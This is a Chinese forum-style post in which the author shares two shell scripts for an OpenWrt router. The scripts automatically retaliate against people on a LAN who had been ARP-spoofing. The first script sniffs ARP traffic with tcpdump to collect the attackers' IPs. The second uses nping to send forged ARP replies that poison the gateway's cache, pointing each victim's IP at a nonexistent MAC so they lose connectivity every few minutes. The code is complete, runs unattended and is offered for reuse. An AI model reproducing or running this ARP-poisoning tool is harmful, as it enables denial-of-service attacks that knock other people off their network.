shell脚本,局域网arp攻击狗实在蛋疼,arptables防火墙只能防止向下欺骗,没法保证这些人攻击网关,所以我给旧路由(极路由1s) 刷了openwrt,用screen 运行了自己写的反攻脚本!
无人值守,自动攻击,对方几分钟断网一次,对于打游戏的那帮人,估计快疯了,横行嚣张局域网1年了,这会儿丫估计快尿了!不建议不懂shell的用,要安装好些软件,ip-full,arptables,nping…
我把代码放上来,懂得拿去改改用,懒得注释!
1.主脚本,用于收集arp攻击设备ip,去重,然后调用子脚本多线程攻击
#!/bin/sh
mac_spc() {
local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')
local f=$(cat macf6e.txt | sed -n "${i}p")
local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')
local l=":${s:0:2}:${s:2:2}:"
echo $f$l
}
rnd_num() {
echo $(awk 'BEGIN{srand();printf int((4*rand())+1)}')
return 0
}
wd=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}' | awk 'BEGIN{FS=".";OFS="."}{print $1,$2,$3}')
gw_ip="${wd}.1"
gw_mac=$(cat /proc/net/arp | grep -w "${gw_ip}" | awk '{print $4}')
ipx=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}')
[ $1 ] && chs=$1 || chs=5
js=0
res=""
lst=""
chs=5
while getopts ':i' OPT; do
case $OPT in
i) $OPTARG + 10 &>/dev/null && chs=$OPTARG ;;
esac
done
while true; do
arping -DI wlan0 ${gw_ip} &>/dev/null
sleep 1s
>attc220806_file
{
tcpdump -qnei wlan0 arp net ${wd} and not host ${gw_ip} and dst host ${ipx} -l | awk -F '[, ]+' '{print $9}' >>attc220806_file
} &>/dev/null &
sleep 60s
killall 'tcpdump'
>attc220806_res
sort -u attc220806_file | grep -v "^$" >attc220806_res
if [ -s './attc220806_res' ]; then
let js++
fmacc=$(mac_spc)
j=10
if [ $js -gt $chs ]; then
js=0
cat /root/attc220806_alst /root/attc220806_res | sort -n | uniq -u >/root/attc220806_grd
lst="/root/attc220806_grd"
else
lst="/root/attc220806_res"
fi
while read i; do
let j++
macc="${fmacc}$j"
{
./ntt2.sh 6 100 "${gw_ip}" "${gw_mac}" "${i}" "${macc}"
} &>/dev/null &
done <${lst}
wait
res="table: ${lst}, $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)"
echo -e "${res}" | tee -a /root/libfl/attc220806log
cat ${lst} >>/root/libfl/attc220806log
else
echo -e "attc220806_res empty!... $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)" | tee -a /root/libfl/attc220806log
fi
sleep $(rnd_num)m
done
2.子脚本ntt2.sh,用于调用nping 刷网关缓存,把对方的ip刷到一个不存在的mac,让对方无法上网
#!/bin/sh
mac_rnd() {
local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')
local f=$(cat /root/macf6e.txt | sed -n "${i}p")
local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')
local l=":${s:0:2}:${s:2:2}:${s:4:2}"
echo $f$l
return 0
}
ctt=$1
ktt=$2
gtw_ip=$3
gtw_mac=$4
fwip=$5
fmac=$6
# echo "nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip"
tmp_fifo="./$$.fifo"
mkfifo "${tmp_fifo}"
exec 6<>"${tmp_fifo}"
rm -rf "${tmp_fifo}"
for i in $(seq 1 $ctt); do
echo
done >&6
for j in $(seq 1 $ktt); do
read -u6
{
nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip
echo >&6
} &>/dev/null &
done
wait
exec 6<&-
exec 6>&-
exit 0
3.效果大概如下图,用另一台openwrt 路由tcpdump 抓的arp包